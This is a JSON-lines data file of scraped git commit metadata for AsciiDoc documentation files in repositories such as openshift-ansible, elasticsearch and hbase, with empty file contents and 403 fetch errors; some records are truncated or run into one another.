{"commit":"c2f2a4542a31ebca502c50ba3a7c95de610df875","subject":"data\/lib: added online readme","message":"data\/lib: added online readme\n","repos":"vdmeer\/skb","old_file":"data\/library\/online\/continuous\/README.asciidoc","new_file":"data\/library\/online\/continuous\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vdmeer\/skb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22d36791e985d0e78f6215bb46c6cd18bd7b719c","subject":"added .yml extension to style guide.","message":"added .yml extension to style guide.\n","repos":"ttindell2\/openshift-ansible,EricMountain-1A\/openshift-ansible,sdodson\/openshift-ansible,mmahut\/openshift-ansible,carlosthe19916\/openshift-ansible,sosiouxme\/openshift-ansible,rjhowe\/openshift-ansible,twiest\/openshift-ansible,gburges\/openshift-ansible,ewolinetz\/openshift-ansible,ewolinetz\/openshift-ansible,rharrison10\/openshift-ansible,maxamillion\/openshift-ansible,menren\/openshift-ansible,rjhowe\/openshift-ansible,spinolacastro\/openshift-ansible,christian-posta\/openshift-ansible,johnjelinek\/openshift-ansible,thoraxe\/openshift-ansible,jwhonce\/openshift-ansible,carlosthe19916\/openshift-ansible,carlosthe19916\/openshift-ansible,robotmaxtron\/openshift-ansible,stenwt\/openshift-ansible,abutcher\/openshift-ansible,git001\/openshift-ansible,mmahut\/openshift-ansible,jwhonce\/openshift-ansible,bparees\/openshift-ansible,zhiwliu\/openshift-ansible,Jandersolutions\/openshift-ansible,detiber\/openshift-ansible,mwoodson\/openshift-ansible,abutcher\/openshift-ansible,miminar\/openshift-ansible,wbrefvem\/openshift-ansible,mmahut\/openshift-ansible,abutcher\/openshift-ansible,DG-i\/openshift-ansible,johnjelinek\/openshift-ansible,nak3\/openshift-ansible,bparees\/openshift-ansible,akram\/openshift-ansible,miminar\/openshift-ansible,gburges\/openshift-ansible,Jandersolutions\/openshift-ansible,abutcher\/openshift-ansible,cgwalters\/openshift-ansible,ttindell2\/openshift-ansible,twiest\/openshift-ansible,bashburn\/openshift-ansible,jwhonce\/openshift-ansible,aveshagarwal\/openshift-ansible,BlueShells\/openshift-ansible,christian-posta\/openshift-ansible,LutzLange\/openshift-ansible,johnjelinek\/openshift-ansible,brenton\/openshift-ansible,jdamick\/openshift-ansible,jaryn\/openshift-ansible,akubicharm\/openshift-ansible,christian-posta\/openshift-ansible,thoraxe\/openshift-ansible,miminar\/openshift-ansible,tagliateller\/openshift-ansible,ewolinetz\/openshift-ansible,base2Services\/openshift-ansible,mwoodson\/openshift-ansible,detiber\/openshift-ansible,henderb\/openshift-ansible,detiber\/openshift-ansible,jaryn\/openshift-ansible,LutzLange\/openshift-a
nsible,wbrefvem\/openshift-ansible,maxamillion\/openshift-ansible,kwoodson\/openshift-ansible,Jandersoft\/openshift-ansible,bashburn\/openshift-ansible,ewolinetz\/openshift-ansible,sborenst\/openshift-ansible,stenwt\/openshift-ansible,tagliateller\/openshift-ansible,miminar\/openshift-ansible,anpingli\/openshift-ansible,xuant\/openshift-ansible,ibotty\/openshift-ansible,aweiteka\/openshift-ansible,sborenst\/openshift-ansible,aweiteka\/openshift-ansible,akubicharm\/openshift-ansible,Jandersoft\/openshift-ansible,sosiouxme\/openshift-ansible,brenton\/openshift-ansible,openshift\/openshift-ansible,DG-i\/openshift-ansible,Jandersolutions\/openshift-ansible,liggitt\/openshift-ansible,pkdevbox\/openshift-ansible,liggitt\/openshift-ansible,ibotty\/openshift-ansible,markllama\/openshift-ansible,thoraxe\/openshift-ansible,EricMountain-1A\/openshift-ansible,spinolacastro\/openshift-ansible,Jandersoft\/openshift-ansible,aveshagarwal\/openshift-ansible,twiest\/openshift-ansible,sosiouxme\/openshift-ansible,rjhowe\/openshift-ansible,DG-i\/openshift-ansible,mmahut\/openshift-ansible,tomassedovic\/openshift-ansible,nhr\/openshift-ansible,git001\/openshift-ansible,rharrison10\/openshift-ansible,zhiwliu\/openshift-ansible,attakei\/openshift-ansible,attakei\/openshift-ansible,VeerMuchandi\/openshift-ansible,sosiouxme\/openshift-ansible,liggitt\/openshift-ansible,akubicharm\/openshift-ansible,tagliateller\/openshift-ansible,sborenst\/openshift-ansible,LutzLange\/openshift-ansible,jimmidyson\/openshift-ansible,quantiply-fork\/openshift-ansible,DG-i\/openshift-ansible,thoraxe\/openshift-ansible,detiber\/openshift-ansible,BlueShells\/openshift-ansible,kwoodson\/openshift-ansible,markllama\/openshift-ansible,Maarc\/openshift-ansible,attakei\/openshift-ansible,jimmidyson\/openshift-ansible,zhiwliu\/openshift-ansible,tagliateller\/openshift-ansible,nhr\/openshift-ansible,wshearn\/openshift-ansible,wbrefvem\/openshift-ansible,xuant\/openshift-ansible,zhiwliu\/openshift-ansible,tagliateller\/openshift-ansible,git001\/openshift-ansible,ibotty\/openshift-ansible,henderb\/openshift-ansible,rhdedgar\/openshift-ansible,markllama\/openshift-ansible,ttindell2\/openshift-ansible,maxamillion\/openshift-ansible,akubicharm\/openshift-ansible,anpingli\/openshift-ansible,mmahut\/openshift-ansible,BlueShells\/openshift-ansible,sdodson\/openshift-ansible,cgwalters\/openshift-ansible,twiest\/openshift-ansible,menren\/openshift-ansible,markllama\/openshift-ansible,nak3\/openshift-ansible,jwhonce\/openshift-ansible,rhdedgar\/openshift-ansible,abutcher\/openshift-ansible,miminar\/openshift-ansible,markllama\/openshift-ansible,openshift\/openshift-ansible,sdodson\/openshift-ansible,xuant\/openshift-ansible,akram\/openshift-ansible,Maarc\/openshift-ansible,tomassedovic\/openshift-ansible,stenwt\/openshift-ansible,sdodson\/openshift-ansible,twiest\/openshift-ansible,quantiply-fork\/openshift-ansible,aveshagarwal\/openshift-ansible,base2Services\/openshift-ansible,EricMountain-1A\/openshift-ansible,pkdevbox\/openshift-ansible,maxamillion\/openshift-ansible,VeerMuchandi\/openshift-ansible,cgwalters\/openshift-ansible,rjhowe\/openshift-ansible,VeerMuchandi\/openshift-ansible,wbrefvem\/openshift-ansible,liggitt\/openshift-ansible,wbrefvem\/openshift-ansible,tomassedovic\/openshift-ansible,EricMountain-1A\/openshift-ansible,base2Services\/openshift-ansible,wshearn\/openshift-ansible,maxamillion\/openshift-ansible,jimmidyson\/openshift-ansible,robotmaxtron\/openshift-ansible,liggitt\/openshift-ansible,sdodson\/openshift-ansible,bashburn\/opensh
ch,andrejserafim\/elasticsearch,trangvh\/elasticsearch,umeshdangat\/elasticsearch,gmarz\/elasticsearch,ivansun1010\/elasticsearch,mmaracic\/elasticsearch,rhoml\/elasticsearch,andrejserafim\/elasticsearch,robin13\/elasticsearch,mikemccand\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch,MaineC\/elasticsearch,F0lha\/elasticsearch,clintongormley\/elasticsearch,gmarz\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,njlawton\/elasticsearch,yanjunh\/elasticsearch,brandonkearby\/elasticsearch,polyfractal\/elasticsearch,camilojd\/elasticsearch,markwalkom\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,JervyShi\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,mikemccand\/elasticsearch,alexshadow007\/elasticsearch,davidvgalbraith\/elasticsearch,artnowo\/elasticsearch,njlawton\/elasticsearch,palecur\/elasticsearch,Helen-Zhao\/elasticsearch,MaineC\/elasticsearch,HonzaKral\/elasticsearch,awislowski\/elasticsearch,JackyMai\/elasticsearch,wbowling\/elasticsearch,jprante\/elasticsearch,davidvgalbraith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,rajanm\/elasticsearch,mjason3\/elasticsearch,camilojd\/elasticsearch,jimczi\/elasticsearch,spiegela\/elasticsearch,wuranbo\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,coding0011\/elasticsearch,snikch\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,diendt\/elasticsearch,LeoYao\/elasticsearch,mohit\/elasticsearch,rhoml\/elasticsearch,naveenhooda2000\/elasticsearch,palecur\/elasticsearch,mapr\/elasticsearch,C-Bish\/elasticsearch,JervyShi\/elasticsearch,StefanGor\/elasticsearch,nknize\/elasticsearch,geidies\/elasticsearch,geidies\/elasticsearch,C-Bish\/elasticsearch,wenpos\/elasticsearch,palecur\/elasticsearch,Shepard1212\/elasticsearch,ESamir\/elasticsearch,i-am-Nathan\/elasticsearch,rmuir\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,artnowo\/elasticsearch,dpursehouse\/elasticsearch,glefloch\/elasticsearch,vroyer\/elasticassandra,mjason3\/elasticsearch,awislowski\/elasticsearch,fred84\/elasticsearch,mapr\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,episerver\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,rajanm\/elasticsearch,MaineC\/elasticsearch,wbowling\/elasticsearch,snikch\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,markharwood\/elasticsearch,naveenhooda2000\/elasticsearch,AndreKR\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,andrejserafim\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,ESamir\/elasticsearch,qwerty4030\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,fernandozhu\/elasticsearch,jprante\/elasticsearch,avikurapati\/elasticsearch,Stacey-Gammon\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,bawse\/elasticsearch,wenpos\/elasticsearch,PhaedrusTheGreek\/elasticsearch,fernandozhu\/elasticsearch,davidvgalbraith\/elasticsearch,i-am-Nathan\/elasticsearch,JervyShi\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,martinstuga\/elasticsearch,HonzaKral\/elasticsearch,mapr\/elasticsearch,nomoa\/elasticsearch,umeshdangat\/elasticsearch,mjason3\/elasticsearch,mortonsykes\/elasticsearch,girirajsharma\/elasticsearch,awislowski\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,nilabhsagar\/elasticsearch,fforbeck\/elasticsearch,nazarewk\/elasticsearch,kaneshin\/elasticsearch,nilabhsagar\/elasticse
arch,elasticdog\/elasticsearch,camilojd\/elasticsearch,F0lha\/elasticsearch,shreejay\/elasticsearch,bawse\/elasticsearch,nomoa\/elasticsearch,wangtuo\/elasticsearch,StefanGor\/elasticsearch,myelin\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,girirajsharma\/elasticsearch,scottsom\/elasticsearch,umeshdangat\/elasticsearch,yanjunh\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,Shepard1212\/elasticsearch,ivansun1010\/elasticsearch,tebriel\/elasticsearch,markharwood\/elasticsearch,rhoml\/elasticsearch,JackyMai\/elasticsearch,cwurm\/elasticsearch,markharwood\/elasticsearch,episerver\/elasticsearch,jchampion\/elasticsearch,F0lha\/elasticsearch,kalimatas\/elasticsearch,andrejserafim\/elasticsearch,obourgain\/elasticsearch,tebriel\/elasticsearch,IanvsPoplicola\/elasticsearch,clintongormley\/elasticsearch,Helen-Zhao\/elasticsearch,jchampion\/elasticsearch,jimczi\/elasticsearch,maddin2016\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,avikurapati\/elasticsearch,ivansun1010\/elasticsearch,wuranbo\/elasticsearch,sreeramjayan\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra5-rc,dpursehouse\/elasticsearch,C-Bish\/elasticsearch,fred84\/elasticsearch,scorpionvicky\/elasticsearch,trangvh\/elasticsearch,strapdata\/elassandra5-rc,coding0011\/elasticsearch,liweinan0423\/elasticsearch,yynil\/elasticsearch,shreejay\/elasticsearch,masaruh\/elasticsearch,scottsom\/elasticsearch,liweinan0423\/elasticsearch,ricardocerq\/elasticsearch,yynil\/elasticsearch,strapdata\/elassandra,girirajsharma\/elasticsearch,sreeramjayan\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,fforbeck\/elasticsearch,elasticdog\/elasticsearch,martinstuga\/elasticsearch,markwalkom\/elasticsearch,gfyoung\/elasticsearch,jchampion\/elasticsearch,C-Bish\/elasticsearch,ricardocerq\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,fforbeck\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,vroyer\/elasticassandra,mmaracic\/elasticsearch,snikch\/elasticsearch,MaineC\/elasticsearch,masaruh\/elasticsearch,JervyShi\/elasticsearch,cwurm\/elasticsearch,xuzha\/elasticsearch,yynil\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,s1monw\/elasticsearch,elasticdog\/elasticsearch,cwurm\/elasticsearch,kaneshin\/elasticsearch,Helen-Zhao\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,jbertouch\/elasticsearch,gmarz\/elasticsearch,polyfractal\/elasticsearch,mortonsykes\/elasticsearch,coding0011\/elasticsearch,obourgain\/elasticsearch,AndreKR\/elasticsearch,wangtuo\/elasticsearch,trangvh\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,vroyer\/elassandra,masaruh\/elasticsearch,sreeramjayan\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,MisterAndersen\/elasticsearch,yynil\/elasticsearch,wbowling\/elasticsearch,girirajsharma\/elasticsearch,jchampion\/elasticsearch,jpountz\/elasticsearch,xuzha\/elasticsearch,mikemccand\/elasticsearch,mapr\/elasticsearch,maddin2016\/elasticsearch,jprante\/elasticsearch,jimczi\/elasticsearch,xuzha\/elasticsearch,jpountz\/elasticsearch,kaneshin\/elasticsearch,ESamir\/elasticsearch,MaineC\/elasticsearch,fred84\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elasticsearch,diendt\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,sneivandt
\/elasticsearch,rmuir\/elasticsearch,pozhidaevak\/elasticsearch,polyfractal\/elasticsearch,xuzha\/elasticsearch,F0lha\/elasticsearch,diendt\/elasticsearch,awislowski\/elasticsearch,zkidkid\/elasticsearch,martinstuga\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,nezirus\/elasticsearch,palecur\/elasticsearch,kaneshin\/elasticsearch,henakamaMSFT\/elasticsearch,girirajsharma\/elasticsearch,lks21c\/elasticsearch,jprante\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,winstonewert\/elasticsearch,spiegela\/elasticsearch,maddin2016\/elasticsearch,a2lin\/elasticsearch,ESamir\/elasticsearch,jpountz\/elasticsearch,JackyMai\/elasticsearch,LeoYao\/elasticsearch,snikch\/elasticsearch,mapr\/elasticsearch,jbertouch\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra5-rc,myelin\/elasticsearch,geidies\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,sreeramjayan\/elasticsearch,gfyoung\/elasticsearch,wangtuo\/elasticsearch,henakamaMSFT\/elasticsearch,jpountz\/elasticsearch,nknize\/elasticsearch,rmuir\/elasticsearch,rlugojr\/elasticsearch,mikemccand\/elasticsearch,ivansun1010\/elasticsearch,sneivandt\/elasticsearch,zkidkid\/elasticsearch,rhoml\/elasticsearch,uschindler\/elasticsearch,dpursehouse\/elasticsearch,a2lin\/elasticsearch,maddin2016\/elasticsearch,ZTE-PaaS\/elasticsearch,henakamaMSFT\/elasticsearch,nazarewk\/elasticsearch,snikch\/elasticsearch,s1monw\/elasticsearch,dongjoon-hyun\/elasticsearch,Helen-Zhao\/elasticsearch,bawse\/elasticsearch,mmaracic\/elasticsearch,xuzha\/elasticsearch,sneivandt\/elasticsearch,shreejay\/elasticsearch,dongjoon-hyun\/elasticsearch,lks21c\/elasticsearch,rhoml\/elasticsearch,vroyer\/elasticassandra,clintongormley\/elasticsearch,elasticdog\/elasticsearch,sneivandt\/elasticsearch,jimczi\/elasticsearch,F0lha\/elasticsearch,naveenhooda2000\/elasticsearch,zkidkid\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,jprante\/elasticsearch,kalimatas\/elasticsearch,markharwood\/elasticsearch,spiegela\/elasticsearch,tebriel\/elasticsearch,bawse\/elasticsearch,markharwood\/elasticsearch,brandonkearby\/elasticsearch,rlugojr\/elasticsearch,GlenRSmith\/elasticsearch,PhaedrusTheGreek\/elasticsearch,GlenRSmith\/elasticsearch,dpursehouse\/elasticsearch,Shepard1212\/elasticsearch,PhaedrusTheGreek\/elasticsearch,JackyMai\/elasticsearch,brandonkearby\/elasticsearch,spiegela\/elasticsearch,scottsom\/elasticsearch,mohit\/elasticsearch,wenpos\/elasticsearch,yanjunh\/elasticsearch,scorpionvicky\/elasticsearch,trangvh\/elasticsearch,sreeramjayan\/elasticsearch,glefloch\/elasticsearch,IanvsPoplicola\/elasticsearch,davidvgalbraith\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,girirajsharma\/elasticsearch,geidies\/elasticsearch,camilojd\/elasticsearch,mjason3\/elasticsearch,naveenhooda2000\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,Stacey-Gammon\/elasticsearch,jbertouch\/elasticsearch,nezirus\/elasticsearch,yanjunh\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nazarewk\/elasticsearch,winstonewert\/elasticsearch,mmaracic\/elasticsearch,episerver\/elasticsearch,nazarewk\/elasticsearch,avikurapati\/elasticsearch,diendt\/elasticsearch,s1monw\/elasticsearch,yanjunh\/elasticsearch,rajanm\/elasticsearch,wbowling\/elasticsearch,camilojd\/elasticsearch,LeoYao\/elasticsearch,ricardocerq\/elasticsearch,strapdata\/elassandra,mapr\/elasticsearch,jbertouch\/elasticsearch,winstonew
ert\/elasticsearch,ZTE-PaaS\/elasticsearch,martinstuga\/elasticsearch,rlugojr\/elasticsearch,nomoa\/elasticsearch,JSCooke\/elasticsearch,C-Bish\/elasticsearch,strapdata\/elassandra,nknize\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,obourgain\/elasticsearch,diendt\/elasticsearch,AndreKR\/elasticsearch,cwurm\/elasticsearch,diendt\/elasticsearch,jchampion\/elasticsearch,StefanGor\/elasticsearch,naveenhooda2000\/elasticsearch,s1monw\/elasticsearch,kalimatas\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,fernandozhu\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra,kalimatas\/elasticsearch,liweinan0423\/elasticsearch,fforbeck\/elasticsearch,kalimatas\/elasticsearch,obourgain\/elasticsearch,IanvsPoplicola\/elasticsearch,myelin\/elasticsearch,scottsom\/elasticsearch,andrejserafim\/elasticsearch,a2lin\/elasticsearch,polyfractal\/elasticsearch,StefanGor\/elasticsearch,polyfractal\/elasticsearch,nezirus\/elasticsearch","old_file":"docs\/community-clients\/index.asciidoc","new_file":"docs\/community-clients\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba2559428a75d9e3f0e2c5fd21ffb9bbd9a115db","subject":"[#608] Developer Guide: Fix formatting errors in the use case (#662)","message":"[#608] Developer Guide: Fix formatting errors in the use case (#662)\n\nThere are formatting errors in the use cases. For example, some use\r\ncases are not properly indented.\r\n\r\nLet's fix them.","repos":"damithc\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4,se-edu\/addressbook-level3,CS2103R-Eugene-Peh\/addressbook-level4,damithc\/addressbook-level4,CS2103R-Eugene-Peh\/addressbook-level4","old_file":"docs\/DeveloperGuide.adoc","new_file":"docs\/DeveloperGuide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/se-edu\/addressbook-level3.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e248997c6b832b452b7e2166001068bbbd66c2d","subject":"Worked on Windows Search documentation","message":"Worked on Windows Search documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/Windows Search.asciidoc","new_file":"documentation\/Windows Search.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92e6577aea86000287ef8f3cd0f1ca65c91e1934","subject":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","message":"Update 2015-11-17-Projeto-Homens-Libertem-se.adoc","repos":"homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io,homenslibertemse\/homenslibertemse.github.io","old_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_file":"_posts\/2015-11-17-Projeto-Homens-Libertem-se.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/homenslibertemse\/homenslibertemse.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"581402b4a476b76c39bdfe1e31993102d7b0a800","subject":"streamline sentence","message":"streamline sentence\n\nSigned-off-by: Dan Mack 
<f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"overview.adoc","new_file":"overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd0aa09cd3d283a80443b7e6a9d2bc953d5e6c82","subject":"Update 2018-07-05-Dart1.adoc","message":"Update 2018-07-05-Dart1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-05-Dart1.adoc","new_file":"_posts\/2018-07-05-Dart1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"609776646e245315861cb436323a1d09f40bcbdb","subject":"Update 2017-05-03-Intro.adoc","message":"Update 2017-05-03-Intro.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-03-Intro.adoc","new_file":"_posts\/2017-05-03-Intro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6120a2d02d9caec3f325d3bc24b3c460323c5383","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30858e540f80ad28fe13b81bd83d803e06a4d86e","subject":"Create CreatingBasicApp.adoc","message":"Create CreatingBasicApp.adoc","repos":"igagis\/morda,igagis\/morda,igagis\/morda","old_file":"wiki\/tutorials\/CreatingBasicApp.adoc","new_file":"wiki\/tutorials\/CreatingBasicApp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/morda.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"911bd35e4ddd9be8de0f452a61cb78bca21ee76c","subject":"Update 2017-08-21-.adoc","message":"Update 2017-08-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-.adoc","new_file":"_posts\/2017-08-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7f659cac4498bdb94fd0e2b9e4339a06eaba9c1","subject":"HBASE-14158 Add documentation for Initial Release for HBase-Spark Module integration","message":"HBASE-14158 Add documentation for Initial Release for HBase-Spark Module 
integration\n\nSigned-off-by: Misty Stanley-Jones <266ae30cabf4e046de6d26e3d43b9d21b534ee4c@cloudera.com>\n","repos":"ChinmaySKulkarni\/hbase,HubSpot\/hbase,Apache9\/hbase,bijugs\/hbase,JingchengDu\/hbase,HubSpot\/hbase,francisliu\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,mahak\/hbase,JingchengDu\/hbase,ultratendency\/hbase,francisliu\/hbase,HubSpot\/hbase,HubSpot\/hbase,ultratendency\/hbase,mahak\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,mahak\/hbase,vincentpoon\/hbase,mahak\/hbase,HubSpot\/hbase,JingchengDu\/hbase,Eshcar\/hbase,francisliu\/hbase,apurtell\/hbase,Apache9\/hbase,ultratendency\/hbase,mahak\/hbase,apurtell\/hbase,Eshcar\/hbase,vincentpoon\/hbase,ultratendency\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,apurtell\/hbase,ndimiduk\/hbase,francisliu\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,Apache9\/hbase,ndimiduk\/hbase,francisliu\/hbase,mahak\/hbase,bijugs\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,Eshcar\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,Apache9\/hbase,bijugs\/hbase,ultratendency\/hbase,JingchengDu\/hbase,francisliu\/hbase,Eshcar\/hbase,HubSpot\/hbase,ultratendency\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,Eshcar\/hbase,JingchengDu\/hbase,ultratendency\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,apurtell\/hbase,ChinmaySKulkarni\/hbase,ultratendency\/hbase,ndimiduk\/hbase,ndimiduk\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,JingchengDu\/hbase,mahak\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,bijugs\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,HubSpot\/hbase,Apache9\/hbase,mahak\/hbase,JingchengDu\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,bijugs\/hbase,bijugs\/hbase,Eshcar\/hbase,apurtell\/hbase,Apache9\/hbase,vincentpoon\/hbase,JingchengDu\/hbase,HubSpot\/hbase,Apache9\/hbase,Apache9\/hbase,ndimiduk\/hbase,gustavoanatoly\/hbase,ultratendency\/hbase,ultratendency\/hbase,vincentpoon\/hbase,gustavoanatoly\/hbase,apurtell\/hbase,ndimiduk\/hbase,francisliu\/hbase,francisliu\/hbase,francisliu\/hbase,ndimiduk\/hbase,vincentpoon\/hbase,ChinmaySKulkarni\/hbase,apurtell\/hbase,HubSpot\/hbase,gustavoanatoly\/hbase,mahak\/hbase,mahak\/hbase,Eshcar\/hbase,bijugs\/hbase,apurtell\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,francisliu\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/spark.adoc","new_file":"src\/main\/asciidoc\/_chapters\/spark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ultratendency\/hbase.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"733da0548dba4d1c2cbf727d833898a1e31c7ace","subject":"Update 2016-04-11-x.adoc","message":"Update 2016-04-11-x.adoc","repos":"dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io,dingboopt\/dingboopt.github.io","old_file":"_posts\/2016-04-11-x.adoc","new_file":"_posts\/2016-04-11-x.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dingboopt\/dingboopt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84b9cc1391d160a13400c59411f65bcfbc2aebb0","subject":"Add solr search documentation","message":"Add solr search 
